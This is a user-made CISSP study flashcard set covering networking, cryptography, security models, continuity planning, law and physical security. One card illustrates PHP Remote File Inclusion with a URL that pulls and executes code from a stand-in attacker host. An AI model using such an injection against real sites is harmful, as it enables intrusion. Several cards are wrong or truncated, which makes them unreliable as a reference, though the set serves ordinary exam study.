CISSP Study Set

Réussis tes devoirs et examens dès maintenant avec Quizwiz!

Ethernet

dominant local area networking technology that transmits network data via frames. Originally physical bus, now supports physical star. Evolved to 1000 megabits to 10

Add Round Key

final function applied in each round. XORS the state with the subkey. Subkey is derived from the key.

Differential Cryptanalysis

find the "difference" between related plaintexts that are encrypted. The plaintexts may differ by a few bits.

Origin of Term: Computer

first used in 1613 to describe a person who added numbers

Static Routes

fixed routing entries, saying "The route for network 10.0.0.0/8 routes via router 192.168.2.7

The User Acceptance test

focuses mainly on the functionality thereby validating the fitness-for-use of the system by the business user.

Cache Memory

is the fastest memory on the system, required to keep up with the CPU as it fetches and executes instructions. Fastest portion is the register file

Host-to-gateway(IPsec)

Client Mode; used to connect one system that runs IPsec client software to an IPsec gateway

Core Impact

Closed Source Penetration Testing Tool

Closed source

Closed source software is software typically released in executable form

SSO Disadvantages

Difficult to retrofit. Unattended desktop. Single point of attack/failure

Elliptic Curve Cryptography

ECC leverages a one-way function that uses discrete logarithms as applied to elliptic curves

HEPA

High efficiency particulate air filters

HDLC

High-Level Data Link Control. Successor to SDLC. HDLC adds error correction and flow control. ARM an ABM modes

IPID

IP Identification field is used to re-associate fragmented packets. "Copy this data beginning at offset 1480."

Data Owner

Information Owner. Management employee responsible for ensuring that specific data is protected. Responsible for enuring data is protected.

Information Security Governance

Information Security at the organizational level. It is the organizational priority provided by senior leadership.

Interrupt

Interrupts are a form of an asynchronous event that occurs. I.E, CPU stops processing current task.

Token Ring(Deterministic

Legacy. Possession of a token allows a node to read or write traffic on a network

VPN

Protected via standards-based end-to-end encryption. IPSEC VPN. May used as measure in Defense in Depth.

RAID

Redundant Array of Inexpensive Disks has the goal to help mitigate the risk associated with hard disk failure

Semantic integrity

each attribute (column) value is consistent with the attribute data type

ePHI and HIPPA

electronic Protected Healthcare Information(ePHI) 2009 Update to U.S. Health Insurance Portability and Accountability Act. Encrypted Health Information is a requirment.

Dynamic Signature

measure the process by which someone signs his/her name.

Partial-Knowledge

are in between zero and full knowledge: the penetration tester receives some limited trusted information.

POPv3

are used for client-server email access

2nd Gen Language

assembly

Assess

assess the extent of the damage to determine the proper steps necessary to ensure the organization's ability to meet its mission and Maximum Tolerable Downtime (MTD).

Backups

assure the availability and integrity of mobile data

Script Kiddies

attack computer systems witth tools and have little or no understanding of. eg; Metasploit framework.

Inference

attacker must logically deduce missing details: unlike aggregation, a mystery must be solved.

Time of Check/Time of Use Attacks

attacks are also called race conditions: an attacker attempts to alter a condition after it has been checked by the operating system, but before it is used.

Disassembler

attempts to convert machine language into assembly.

Root-cause analysis

attempts to determine the underlying weakness or vulnerability that allowed the incident to be realized.

Organization Registration Authorities(ORAs)

authenticate the identity of a certificate holder before issuing a certificate to them

Object Oriented Database

combines data with function of code an object-oriented framework/infrastructure.

Pipe lining

combines multiple steps into one combined process. Pipeline Depth is the number of simultaneous stages that may be completed at once. Like and automobile assembly line.

Hybrid Analysis

combines objective quantitative analysis and subjective qualitative analysis.

Computer Crime: 3 Types

computer systems as targets, computer systems as a tool to perpetrate the crime, or computer systems involved but incidental.

Level 2 Caches

connected to (but outside) the CPU. SRAM is used for cache memory.

Host-to-Host/Transport Layer

connects the Internet Layer to the Application Layer Layer 4 (Transport)

Customary Law

customs our practices that are so commonly accepted by a group that the custom is treated as law. Concept of "best practices" is closely associated with Customary Law.

Slack space

data is stored in specific size chunks known as clusters (clusters are sometimes also referred to as sectors or blocks)

Layer 6 - Presentation

presents data to the application (and user) in a comprehensible way

Account lockouts

prevent an attacker from being able to simply guess the correct password by attempting a large number of potential passwords

Interface Testing

primarily concerned with appropriate functionality being exposed across all the ways users can interact with the application.

Symmetric ciphers

primarily used for confidentiality

Rootkits

replaces portion of the kernel and\or operating system. Lies in ring 3. Commonly rootkitted binaries include the ls or ps commands on Linux/UNIX.

Object-Oriented Programming (OOP)

replicates the use of objects in computer programs.

NIDS

require promiscuous network access in order to analyze all traffic

Health Insurance Portability and Accountability Act (HIPAA)

requires that medical providers keep the personal and medical information of their patients private.

Pool NAT

reserves a number of public IP addresses in a pool

Scoping

the process of determining which portions of a standard will be employed by an organization. Eg, wireless provisions for a wireless company would out-of-scope.

Software Escrow

the process of having a third party store an archive of computer software. Often negotiated as part of a contract with a proprietary software vendor

Facial Scan

the process of passively taking a picture of a subject's face and comparing that picture to a list stored in a database

Client-Side Attacks

user downloads malicious content. Difficult for organization that allow Internet access. Clients include word processing software, spreadsheets, media players, web browsers. Flash, acrobat, iTunes, Quicktime.`

Multicast

uses "Class D" addresses when used over IPv4. Eg: streaming audio or video

Traceroute

uses ICMP Time Exceeded messages to trace a network route

War dialing

uses a modem to dial a series of phone numbers. Looks for answering modem carrier.

Dictionary Attack

uses a word list: a predefined list of words, and each word in the list is hashed. If the cracking software matches the hash output from the dictionary attack to the password hash, the attacker has successfully identified the original password.

Hacker

A malicious individual who attacks computer systems.

AES

Advanced Encryption Standard. Current US standard for symmetric block cipher. Uses 128 bit(10 rounds), 192 bit(12 rounds of encryption, 256 bit(14 rounds of encryption). FIPS approved standard until 2030.

Internet Layer

Aligns with Layer 3 (Network) layer of the OSI model

CMP

Crisis Management Plan designed to provide effective coordination among the managers of the organization in the event of an emergency or disruptive event.

Socket Pairs

Describes a unique connection between two nodes. "Established" during a connection

Information Flow Model

Describes how information may flow in a secure system.

Biometric Enrollment

Describes the process of registering with a biometric system. Creating an account for the first time

Compliance(Policy)

Describes two related issues: How to judge the effectiveness of the policies(how well they work), and what happens when the policy is violated.

SDLC 5

Design

Compliance acceptance testing

It is also known as regulation acceptance testing is performed against the regulations which must be adhered to, such as governmental, legal or safety regulations

PPP

Layer 2 protocol that has largely replaced SLIP. PPP is based on HDLC (discussed previously), and adds confidentiality, integrity, and authentication via point-to-point links. Synchronous links(T1's)

SLIP

Layer 2 protocol that provides IP connectivity via asynchronous connections such as serial lines and modems

Switch

Layer 2, based on MAC

Router

Layer 3 Devices that routes traffic from one LAN to another LAN. IP based routers make routing deisions based on the source and destination IP Addresses.

Routers

Layer 3 devices that route traffic from one LAN to another

Router

Layer 3, based on IP

Packet Filter and Stateful Firewalls

Layers 3 and 4. IP Addresses and Ports.

FDDI

Legacy. Fiber Distributed Data Interface. A logical network ring via a primary and secondary counter-rotating fiber optic ring

Unit Testing

Low-level tests of software components, such as functions, procedures or objects

Virtualization Benefits

Lower hardware cost, less cooling needs, snapshots allow reversion to past states.

Water(Fire)

Lowers temperature

1st Gen Language

Machine Code

802.1X

Port Based Network Access Control. Includes EAP

Detective Controls

They alert during or after a successful attack. Intrusion detection systems(IDS) and CCTV are examples of detective controls.

Archive Bits

This bit is a file attribute used to determine whether a file has been archived since last modification. Incremental will set bit from 1 to 0 after backup.

Static testing

includes walkthroughs, syntax checking, and code reviews

Screened Host Architecture

is an older flat network design using one router to filter external traffic to an from a bastian host.

DCOM

locate objects over a network.

Business Continuity Plan

long-term plan to ensure the continuity of business operations

Volatile Memory

loses integrity after power loss.

Remote Journaling

may be used to recover from a database failure.

Evacuation Routes

meeting points are critical.

Return on Investment

money saved by deploying a safeguard

Preponderance

more likely than not.

Hashing

one way cryptographic transformation

Unicast

one-to-one traffic, such as a client surfing the Web

Hash Function

one-way encryption use an algorithm and no key

Cripple ware

partially functioning proprietary software, often with key features disabled.

Magnetic Stripe Card

passive device that contains no circuits. Read when swiped through a card reader.

Cohesive Object

perform most functions independently. Inverse relation to Coupling.

EU-US Safe Harbor

personal data of EU Citizens may not be transmitted, even when permitted by the individual, to countries outside the EU unless the receiving country is perceived by the EU to adequately protect data.

Security Safeguards Principle

personal data should be reasonably protected against unauthorized use.

Use Limitation Principle

personal data should never be disclosed without either the consent of the individual or as the result of a legal requirement

Smart Card

physical access control device that is often used for electronic locks, credit card purchases. Can be Contact of Contactless

Procedural languages

programming languages that user subroutines procedures and functions

Top-Down (TD)

programming starts with the broadest and highest level requirements (the concept of the final program)

Surge

prolonged high voltage

Blackout

prolonged loss of power

Corrective Controls

work by "correcting" a damaged system or process. The corrective access control typically works hand-in-hand with detective. Antivirus software is an example.

Pattern Matching IDS

works by comparing events to static signatures

Coupled Object

requires lots of other objects to perform basic jobs, like math. Inverse to cohesion

Broadcast

sent to all stations on a LAN

Shadow Database

serves as a live backup for a database. Not regularly accessed by the client.

Circumstantial Evidence

serves to establish the circumstances related to particular points or even other evidence.

Fault

short loss of power

Fences

simple deterrent

Unlicensed Band

small amount of contiguous radio spectrum set aside for unlicend

Applets

small pieces of mobile code that are embedded in other software such as Web browsers. Executables written in a variety of languages.

Register

small storage locations used by the CPU to store instructions and data.

Cryptographic requirements

speed, strength, cost, complexity must be weighed against each other.

Weak Tranquility Property

states that security labels will not change in a way that conflicts with defined security properties

Strong Tranquility Property

states that security labels will not change while the system is operating.

Dynamic Random Access Memory (DRAM)

stores bits in small capacitors (like small batteries), and is slower and cheaper than SRAM. DRAM Capacitors leak charge. they must be continually refreshed to maintain integrity.

Multilevel

stores objects of differing sensitivity lables and allows system access by subjects wit differing clearances. A reference monitor mediates access between subjects and objects.

Compilers

such as C or Basic, and compile it into machine code.

Soda Acid

suppresses fire, starving oxygen to fire

Mirroring

used to achieve full data redundancy by writing the same data to multiple hard disks

SMTP

used to transfer email between servers

Processes and Threads

Process is an executable program. Heavy Weight Process(HWP) is also called a task. Parent process may spawn child processes called threads. Sharing memory, these processes are less exhaustive.

Procurement

Process of acquiring products or services from a 3rd party.

ISO 17799

Renumbered to 27002 in 2005. ISO 27001 is a related standard, formally called ISO/IEC 27001:2005 Information Security Managment Systems-Requirements. Based on BS 7799 Part 2.

Hub

Repeater with two or more ports. No Security, no Isolation. Half Duplex. One "Collision" Domain. Unsuitable for Modern purposes

ROC

Report of Compliance

RFC

Request for Comments, a way to discuss and publish standards on the Internet

Security Policies and Procedures

Required parts of any successful information security program.

SDLC 4

Requirements Analysis

Technical Countermeasures

Routers, switches, firewalls.

User Access Permissions Table

Rows show capabilities of each subjects(capability list). Columns show the ACL for each object or application

Paravirtualization

Runs Modified OS

Multiprocessing

Runs multiple processes on multiple CPU's. Two types of multiprocessing Symmetric Multiprocessing(SMP)

iSCSI

SAN protocol that allows for leveraging existing networking infrastructure and protocols to interface with storage

ECB

SImplest and weakest from of DES. Using initialization vector(IV) or chaining. Identical plaintexts with identical keys encrypt identical cipher text **BLOCK***

Annualized Loss Expectancy(ALE)

SLE X ARO; Cost of losses per Year

The TCP handshake

SYN, SYN-ACK, ACK. The client chooses an initial sequence number, set in the first SYN packet. Once a connection is established, ACKs typically follow for each segment

Preamble

Safety of the commonwealth duty to our principals, and to each other requires that we adhere, to the highterst ethical standaards of behavior.

RAID 4

Same as 4. Stripes data at the block.

Side-Channel Attack

Side-channel attacks use physical data to break a cryptosystem, such as monitoring CPU cycles or power consumption used while encrypting or decrypting

Cipher Feedback

Similar to CBC. CFB is a stream mode cipher, uses an IV(Random Number/NONCE), errors propagate. **STREAM**

SMTP

Simple Mail Transfer Protocol, a store-and-forward protocol used to exchange email between servers

SNMP

Simple Network Management Protocol, primarily used to monitor network devices. HP OpenView and MRTG use SNMP

Vernam Cipher

Simple XOR cipher that can be implemented with phone switches.

Thin Clients

Simple than normal computer systems, with hard drives, full operating systems, locally installed applications, etc. They rely on servers for applications and storage of associated data. Eg: Diskless workstations. Use WEb Browser as a universal client

Asymmetric and Symmetric Tradeoffs

Slower than symmetric, and weaker per bit of key length. But much more secure

SCSI

Small Computer System Interface Disk Drive

Band

Small amount of contiguous radio spectrum. Wireless tech uses 2.4 and 5 ghz

FCoE

Storage Area Network(SAN) leverages Fiber Channel, which has long been used for storage networking

Data at Rest

Stored Data. Residing on a Disk or In a File.

Firmware

Stores small programs that do not change frequently, such as a computer's BIOS. Router OS.

Stream Cipher

Stream modes(ciphers) means each bit is independently encrypted

RAID 3

Striped Set with Dedicated Parity (Byte Level). Striping is desirable due to the performance gains associated with spreading data across multiple disks. An additional disk is leveraged for storage of parity information, which is used for recovery in the event of a failure.

RAID 5

Striped Set with Distributed Parity. Focus on striping for the performance increase. And parity in case of failure

RAID 6

Striped Set with Dual Distributed Parity

RAID 0

Striped Set: employs striping to increase the performance of read and writes

Bollard

Strong post designed to stop a car, Also to tie ship to pier. Installed in front of building to protect them. Large concrete planters are used to the same effect.

Writing Up

Subject writes up; data flows up.

Qualitative Analysis

Subjective analysis of approximate values

Role-Based Access Controls

Subjects are grouped into roles and each defined role has access permissions based upon the role, not the individual

Polyalphabetic cipher

Substitution

File Permissions

Such as read, write, and execute, control access to files.

BCP/DRPaS

SunGard Casualty Services(IBM)

Tailoring Process: 5

Supplementing baselines with additional security controls and control enhancements, if needed; and;

Pairwise Testing

Suppose we want to demonstrate that a new software application works correctly on PCs that use the Windows or Linux operating systems.

Thrashing

Swapping memory from active processes when both RAM and Swap Space is full. Impacts availability

SPAN ports

Switched Port Analyzer (SPAN) port is one way to see unicast traffic sent to and from other devices on the same switch. SPAN(Cisco), Mirror(HP). Can be the cause of bandwidth over load(24-port switch/mirror 23 100 mbit streams.)

Kerberos Characteristics

Symmetric encryption. Provides mutual authentication of both clients and servers. Potects against network sniffing and replay attacks

14:SYN

Synchronize a connection

Integration Testing

Testing multiple software components as they are combined into a working system. Subsets may be tested, or Big Bang integration testing tests all integrated software components

Regression Testing

Testing software after updates, modifications, or patches

Installation Testing

Testing software as it is installed and first operated

User Acceptance Testing

Testing that is done directly by the customer.

Static Testing

Tests code passively: the code is not running.

Dynamic Testing

Tests code while executing it

***Canons Note***

The canons are applied in order, and when face with an ethical dilemma, you must follow the canons in order. i.e

Difference between Reading Up & Writing Down

The direction that information is being passed

Security Target (ST)

The documentation describing the ToE, including the security requirements and operational environment

Full Backup

The easiest to understand of the types of backup; it simply is a replica of all allocated data on a hard disk. Time is a con

Target of Evaluation(ToE)

The system or product that is being evaluated

Modem

"Modulator/Demodulator" takes binary data and modulates it into anolog sound that can be carried on phone networks designed to carry voice.

Bell-LaPadula Security Model

"No Read Up" (NRU). Also known as the the Simple Security Property. Focused on protecting confidentiality.

Simple Integrity Axiom

"No read down:" A subject at a specific classification level cannot read data at a lower classification. Prevents movement of bad information

Simple Security Property

"No read up:" a subject at a specific classification level cannot read an object at a higher classification level. 'Secret' Clearance holders not able to access 'Top Secret'

* Security Property(Star Security Property)

"No write down." A subject at a higher classification level cannot write to a lower classification level.

* Integrity Axiom

"No write up:" A subject at specific classification level cannot write to data at a higher classification.

PROM

(Programamble Read Only Memory) can be written to once, typically at the factory.

Reserved Ports

0-1023

Class A

0.0.0.0 - 127.255.255.255 16,777,216 addresses

Project Initiation

1. Develop the contingency planning policy statement 2. Conduct the business impact analysis (BIA) 3. Identify preventive controls 4. Develop recovery strategies 5. Develop an IT contingency plan 6. Plan testing, training, and exercises 7. Plan maintenance

BIA Processes

1. Identification of Critical Assets 2. Comprehensive Risk Assessment

CHAP Process

1. Server sends a challenge 2. The user takes the challenge string and the password, uses a hash cipher such as MD5. 3. The CHAP server also hashes the password and challenge, creating the expected response

AES Four Functions

1. SubBytes 2. ShiftRows 3. MixColumns 4. AddRoundKey Functions provide confusion,diffusion, and XOR encryption.

COBIT; 4 domains

1.Plan and Organize, 2.Accquire and Implement 3.Deliver and Support 4.Monitor and Evaluate

TGT Lifetime

10 Hours

Ephemeral Ports

1024-65535

IPv6 header

128 bits in All:(use colons instead of periods) Version: IP version Traffic Class and Flow Label Payload Length Next header Hop Limit fc01::20c:29ff:feef:1136/64 (Scope:Global) fe80::20c:29ff:feef:1136/64 (Scope:Link)

Class B

128.0.0.0.0 - 191.255.255.255 65,536 addresses

Bluetooth(802.15)

2.4 ghz like 802.11. Transmit data over short distances. Class 3: under 10 meters Class 2: 10 meters Class 1: 100 meters. Automatic Discovery should be off.

IPv4 Header Fields

20 Bytes in All: Version IHL: Length of the IP header Type of Service Identification, Flags, Offset Time To Live Protocol Source and Destination IP addresses Optional

802.11 Security

802.11 wireless security standards (including WEP and 802.11i/WPA2

Types of Wireless

802.11: 2Mbps/2.4 ghz 802.11: 54Mbps/5ghz 802.11: 11Mbps/2.4 ghz 802.11: 54Mbps/2.4 ghz 802.11: 72-600/2.4 ghz/5ghzy

Supplicant

802.1X client

Object

A "black box" that combines code and data, and sends and receives messages

Rainbow Tables

A Rainbow Table is a pre-computed compilation of plaintexts and matching ciphertexts (typically passwords and their matching hashes)

Penetration Tester

A White Hat Hacker who receives authorization to attempt to break into an organization's physical or electronic perimeter.

Backup

A backup is the most basic and obvious measure to increase system or data fault tolerance by providing for recoverability in the event of a failure.

Switch

A bridge with two or more ports. bet practice; connect one device per switch. Associates MAC address of each computer and server with its port. Shrinks collision domain.

Memory

A series of on-off swtiches representing bits: 0's off. 1's on. Random Access Memory, Sequential Memory, Read Only Memory are all types.

Tape Rotation Methods

A common tape rotation method is called FIFO

Removable Media Controls

A common vector for malware propagation is the AutoRun feature of many recent Microsoft operating systems. Turn off Autorun functionality.

Licenses

A contract between a provider of Software and the consumer.

Remote wipe capability

Ability to erase data from a lost or stolen device remotely.

Ring Model

A form of CPU hardware layering that separates and protects domains. Ex: Intel x86, has four rings ranging from 0(kernel) to ring 3 (user). Innermost ring is most trusted. Concentric communication between rings

Clearance

A formal determination of whether or not a user can be trusted. Require interview

Hub

A half duplex device. Like a repeater but with more than two ports. (No Security). Cannot send and receive simultaneously. Can provide

Caesar Cipher

A historical example of a substitution cipher.

Known Plaintext Attack

A known plaintext attack relies on recovering and analyzing a matching plaintext and ciphertext pair. Multiple ciphertexts maybe encrypted with same key

Retina Scan

A laser scan of the capillaries that feed the retina. Retina scans are rarely used because of health risks and invasion-of-privacy issues

Lights

A light that allows a guard to see an intruder is acting as a detective control. Fresnel lenses to aim light in a specific direction. Measured in Lumens

Spring-bolt lock

A locking mechanism that "springs" in and out of the doorjamb

Process Isolation

A logical control that attempts to prevent one process from interfering with another. This is a common feature among multi user operating. Lack of Process Isolation in OS's like MS-DOS. Another user should not be able to have an effect on that process(Trojan)

***EXAM Warning***

A logical ring can run via a physical ring, but there are exceptions. FDDI uses both a logical and physical ring.

Hanlon's Razor

A maxim that reads "Never attribute to malice that which is adequately explained by stupidity."

Meet-in-the-Middle Attack

A meet-in-the-middle attack encrypts on one side, decrypts on the other side, and meets in the middle. Attack against double DES which encrypts two keys in "Encrypt, Encrypt..." Seeks to recover the 2 keys used to encrypt.

Redundant Array of Inexpensive Disks

A method of using multiple disk drives to achieve greater data reliability, greater speed, or both

Callback

A modem-based authentication system. Callback account is created, the modem number the user will call from is entered into the account.

Advanced Encryption Standard

A modern cipher

DevOps

A more agile development and support model echoing the agile programming methods. "the practice of operations and development engineers participating together in the entire service lifecycle, from design through the development process to production support."

TACACS

A ntralized access control system that requires users to send an ID. TACACS uses UDP port 49 (and may also use TCP). Reusable passwords are a vulnerability

Object

A passive data file

Ring Topology

A physical ring connects network nodes in a ring

Covert Channel

A policy-viloating communication that is hidden from the owener or user of a data system. There are unused fields within the TCP/IP Headers which may be used for covert channels. Eg: Obfuscation.

Mantrap

A preventive physical control with two doors. Each door requires a separate form of authentication to open

ISO/IEC 24762:2008

A separate ISO plan for disaster recovery. Information technology—Security techniques—Guidelines for information and communications technology disaster recovery services.

Clark Wilson

A real world integrity model that protects integrity by requiring subjects to access objects via programs. Effectively limits the capabilities of the subject. Well formed transactions, Separation of Duties.

Packet Filter

A simple and fast firewall. Has no concept of state. Decisions are made on basis of single packet. EG: allows ICMP Echo Replies, and UDP DNS Replies.

Counter-based synchronous dynamic tokens

A simple counter: the authentication server expects token code 1, and the user's token displays the same code 1. Once used, the token displays the second code, and the server also expects token code 2. PIN

IPsec Security Association (SA)

A simplex(one-way) connection that may be used to negotiate ESP or AH parameters. Unique 32 Bit number called Security Parameter Index(SPI) identifies each simplex SA connection.

Procedure

A step-by-step guide for accomplishing a task. Like Policies, they are mandatory

Access Control Matrix

A table that defines access permissions between specific subjects and objects. A matrix is a data structure that acts as a table lookup for the operating system.

Fuzzing

A type of black box testing that submits random, malformed data as inputs into software programs to determine if they will crash

Roaming Infected Laptop

A user with an infected laptop plugs into a typical office network and requests an IP address from a DHCP server. Once given an IP, the malware installed on the laptop begins attacking other systems on the network. EAP Protects. WLANs are susceptible

Transformation Procedure (TP)

A well-formed transaction, and a constrained data item (CDI) is data that requires integrity. For each TP, an audit record is made and entered into the access control system. Provides both detective and recovery controls in case integrity is lost.

Abstraction

Abstraction hides unnecessary details from the user. Complexity is the enemy of security. The more complex a process, the less secure it is. User presses play; hears music.

Need to Know

Access determination is based upon clearance levels of subjects and classification levels of objects. A form of Mandatory Access Control.

2 Types of NIPS

Active Response, and Inline

ActiveX

ActiveX controls are the functional equivalent of Java applets. They use digital certificates instead of a sandbox to provide security.

8:CWR

Added in 2001: Congestion Window Reduced

9:ECE

Added in 2001: Explicit Congestion Notification Echo)

Fire Class A

A: Ordinary Combustibles -Wood -Paper -Rubber -Plastic

Asynchronous Balanced Mode

ABM initiating transmissions without receiving permission

Malware

AKA Malicious Code. The generic term for any type of software that attacks and application or system. Viruses, worms, Trojans, Logic Bombs.

Note!

All Information Security Professionals should understand Hanlon's Razor. There is plenty of malice in our world: worms, phishing attacks, identity theft, etc. But there is more brokenness and stupidity: most disasters are caused by user error. "Never attribute to malice that which is adequately explained by stupidity

Convergence

All routers on a network agree on the state of routing. A network that has experienced no recent outages is normally "converged". Closest routers know of outage first.

Application Whitelisting

Allowing binaries to run that: Are signed via a trusted code signing digital certificate. Match a known good cryptographic hash Have a trusted full path and name

Decentralized access control

Allows IT administration to occur closer to the mission and operations of the organization. An organization spans multiple locations, and the local sites support and maintain independent systems, access control databases, and data

Multitasking

Allows multiple tasks (heavy weight processes) to run simultaneously on one CPU. Older OS's are non-multitasking.

Hypervisor

Allows multiple virtual operating guest to run one one host

Trusted Computer System Evaluation Criteria(TCSEC)

Also known as the Orange Book

PHP Remote File Inclusion (RFI)

Altering normal PHP URLs and variables such as "http://good.example.com?file=readme.txt" to include and execute remote content, such as: http://good.example.com?file = http://evil.example.com/bad.php[42]

NIPS

Alters the flow of the traffic. Two types. Active Response and Inline

***EXAM WARNING*** Best thing to do?

Always consider hire or ask an expert as a valid choice in regards to "the best thing to do." The safest answer is often the best. The legal, ethical, and fair answer is usually the best as well.

***EXAM WARNING***

Always ensure that any forensic actions uphold integrity, and are legal and ethical.

SIGABA

American encryption device

Subject

An active entity on a data system. People accessing data files, DLL or Perl script that updates database files with new information.

Collusion

An agreement between two or more individuals to subvert the security of a system

Waterfall Model

An application development model that uses rigid phases; when one phase ends, the next begins

WLAN DoS

An attacker can pollute wireless spectrum(Channel Interference)

VMEscape

An attacker exploits the host OS or a guest from another guest. IDS's and IPS's can be blinded by virtualization. SPAN port cannot see traffic between virutal hosts.

Protection Profile(PP)

An independant set of security requirements and objectives for a specific category of products or systems, such as firewalls or intrusion detection systems(IDS)

Implementation Attacks

An implementation attack exploits a mistake (vulnerability) made while implementing an application

International Common Criteria

An internationally agreed upon standard for describing and testing the security of IT products. Designed to avoid requirements beyond current state of the art. Presents a hierarchy of requirements for a range of classifications and systems.

Iris Scan

An iris scan is a passive biometric control. A camera takes a picture of the iris. Compares photos within the authentication database

Object

Any passive data within the system. Objects can range from documents on physical paper, to database tables to text files. Objects are passive; they do not manipulate other objects.

Preventive Controls

Apply restriction to what a potential user, either authorized or unauthorized, can do. Pre-employment drug screening is preventative

Tailoring Process: 2

Applying scoping considerations tothe remaining baseline security controls;

Turn stiles

Are designed to prevent tailgating. Enforcing one-person authentication

Baselines

Are uniform ways of implementing a standard. "Harden the system by applying the Center for Internet Security Linux benchmarks." Discretionary

ANN

Artificial Neural Network seeks to replicate the capabilities of biological neural networks.

Humidity Levels

Computers and Data Centers: 40-55% 68-77 Degrees F. Suffiecient Airflow is key. Green push recently has widened te rnage for temp and humidity levels

NIST SP800-34

Aspecific set of requirements to review and implement a sound BCP • Project Initiation • Scope the Project • Business Impact Analysis • Identify Preventive Controls • Recovery Strategy • Plan Design and Development • Implementation, Training, and Testing • BCP/DRP Maintenance

PCI Qualifies Security Assesor

Assesses the security of an organization that uses credit cards. Report of Compliance(ROC) and Attestation of Compliance(AOC) may be issued

Tailoring Process: 4

Assigning specific values to organization-defined security control parameters via explicit assignment and selection statements

Trademarks

Associated with marketing. Purpose is to allow for the creation of a brand that distinguished the source of products or services.

Wireless Security

Associated with shared tenancy. Wireless attacks raise concerns

3 A's of Access Control

Authentication, Authorization, and Accountability

Penetration Testing

Authorized attempt to break into an organization's physical or electronic perimeter (and sometimes both)

Routing Protocols

Automatically learn a network topology and determine the beast routes between all network points. Employs backup routes in case of router outage.

Security Awareness and Training

Awareness changes user behavior. Training provides a skill set.

Kerberos 4

Ay user may request a session key for another user. Kerberos does not mitigate a malicious local host: plaintext keys may exist in memory or cache

Fire Class B

B: Flammable Liquids -Liquids -Greases -Gases

ISO/IEC-27031

BCP Guidelines 1. Provide a framework (methods and processes) for any organization 2. Identify and specify all relevant aspects 3. Enable an organization to measure its continuity, security 4. ICT—Information and Communications Technology 5.ISMS—Information Security Management System

EGP

BGP

CWE: Hard-coded credentials

Backdoor username/passwords left by programmers in production code

BIOS

Basic Input Output System(BIOS) Firmware is stored in ROM. While ROM is read-only, some types of ROM can be written to via flashing.

Star topology

Become the dominant physical topology for LANs

Block Cipher

Block mode(ciphers) encrypt blocks of data each round.

BOOTP

Bootstrap Protocol used (in conjunction with TFTP for download) for bootstrapping via a network by diskless systems.BIOSs now support BOOTP.

BGP

Border Gateway Protocol, the routing protocol used on the Internet. Has distance vector properties but is formally considered a path vector routing protocol.

CPU

Brains of the computer. Capable of performing complex mathematical calculations. Rated by number of clock cycles per second. 2.4 GHz has 2.4 Billion clock cycles per second.

ISO 17799

Broad based approach for Information Security code of practice. Full title ISO/IEC 17799:2005. Code of Practice for Information Security Management.

Electronic Communications Privacy Act(ECPA)

Brought search and seizure protection to non-telephony electronic communications. Protect from warrantless wiretapping. PATRIOT Act weakened some of the ECPA restrictions.

Senior Management

Business Owners and Mission Owners. Ensuring all organizational assets are protected.

Primary Information Security Roles

Business Owners, Mission Owners, Data Owners, System Owners, Custodians, and Users.

Fuji-Xerox

Business scholars and practitioners were asking such questions as 'What are the key factors to the Japanese manufacturers' remarkable successes?

Trade Secrets

Business-proprietary information that is important to an organizations ability to compete. Business information that provides a competitive edge. Due care and due diligence must be exercised.

Biba Model

Businesses desire to ensure that integrity of the information is protected at the highest level. Ensures integrity protection is vital. Has two primary rules: the Simple Integrity Axiom and the Integrity Axiom. Reverses "Bell-Lapadula" rules.

Fire Class C

C: Electrical Equipment

CIA Write Up Concept

CIA operates intelligence collection using the write up concept. The sensitivity of the final object will be much higher than the level of access of any of the agents.

3rd Gen Language

COBOL, C, Basic

COOP

Continuity Of Operations Plan. Sustain an organziations essential, strategic functions at an alternate site for up to 30 days.

Random Access Memory(RAM)

CPU may randomly access(jump to) an location in memory. Volatile but not as volatile as it once was believed

CTR

CTR is counter mode. This mode shares the same advantages as OFB(patterns are destroyed and errors do not propagate) **STREAM**

Cable modems

Cable TV providers to provide Internet access via broadband cable TV. Unlike DSL, Cable Modem bandwidth is typically shared with neighbors on the same network segment

Tree Topology

Called hierarchical network: a network with a root node, and branch nodes that are at least three levels deep.

Dust

Can cause static buildup and overheating

Vendor, Consultant, and Contractor Security

Can introduce risks to an organization. Third party personnel with access to sensitive data must be trained properly

CSMA/CD

Carrier Sense Multiple Access with Collision Detection used to immediately detect collisions within a network

CSMA

Carrier Sense Multiple Access: Shared usage on Ethernet. Avoid collisions

Embedded Device Forensics

Cell phones, GPS receiver and PDA (Personal Digital Assistant) devices are so common that they have become standard in today's digital examinations. Common carriers of Malware.

CHAP

Challenge Handshake Authentication Protocol. It uses a central location that challenges remote users. As stated in the RFC, "CHAP depends upon a 'secret' known only to the authenticator and the peer. A sniffer that views the entire challenge/response process will not be able to determine the shared secret.

Asynchronous dynamic tokens

Challenge-response tokens. Challenge-response token authentication systems produce a challenge, or input for the token device. PIN

Dynamic passwords

Change at regular intervals. RSA Security makes a synchronous token device called SecurID that generates a new token code every 60 seconds

Layered Design

Changing your physical network connection from wired to wireless (At Layer 1) has no effect on your Web Browser(at Layer 7)

Contraband Checks

Checks identifying objects that are prohibited. port blocking used in conjunction with contraband checks are part of Defense in Depth

TPM

Chip on system motherboard for authenticity. Ensures boot integrity. protects from Kernel Mode Rootkits, Full Disk Encryption.

CBC

Cipher Block Chaining: DES that XORs the previous encrypted block to the next block of plaintext to be encrypted. First block is an IV. Encryption errors happen. **BLOCK**

Running Key Cipher

Cipher that uses modular math

4th Gen Language

ColdFusion, Progress 4GL, Oracle Reports

Credential Set

Combination of both the identification and authentication of a user.

Network Access Layer

Combines Layer 1 (Physical) and Layer 2 (Data Link) of the OSI model.

Application Layer

Combines Layers 5 through 7 (Session, Presentation, and Application) of the OSI model

COTS Software

Commercial Off-the-Shelf

Secondary Evidence

Common in cases involving computers. Consists of copies of original documents and oral descriptions i.e. Logs.

Sharia Law

Common religious law for Islam. It uses the Qur'an and Hadith as its foundation.

Port Isolation

Commonly employed with the increasing density of virtualized systems in datacenters. Severely limits lateral movement. Generally cumbersome if not done virtually.

Mirroring

Complete duplication of data to another disk, used by some levels of RAID.

CISC

Complex Instruction Set Computer. Uses large set of complex machine language instructions.

COM

Component Object Model locates objects on a local system

IAB Practice 5

Compromises the privacy of users.

Source code

Computer programming language instructions that are written in text that must be translated into machine code before execution by the CPU

Computer Systems as a Target

Computer system serves as primary target. DDoS, Installing Malware for Spam, Exploiting Vulnerabilities

Bots

Computer system that is running malware that controlled via a botnet. Steal info, DoS, Send Spam

System Unit

Computer's case. Contains all of the internal electronic components. Motherboard, disk drives, power supply.

CASE

